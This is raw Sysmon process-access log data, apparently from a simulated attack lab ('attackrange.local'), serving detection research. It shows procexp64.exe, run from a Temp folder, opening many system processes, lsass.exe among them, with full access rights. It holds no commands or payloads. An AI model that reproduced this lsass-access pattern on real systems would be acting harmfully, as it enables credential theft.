15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791542Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791541Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791540Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791539Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791538Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791537Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791536Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791535Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791534Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791533Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791532Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791531Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791530Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791529Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791528Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791527Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791526Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791525Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791524Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.641{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791523Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.641{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791522Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.641{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791521Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.641{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791520Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.641{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791519Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.641{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791518Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.641{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791517Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.641{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791516Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.641{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791515Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.641{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791514Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.641{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791513Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.641{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791512Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 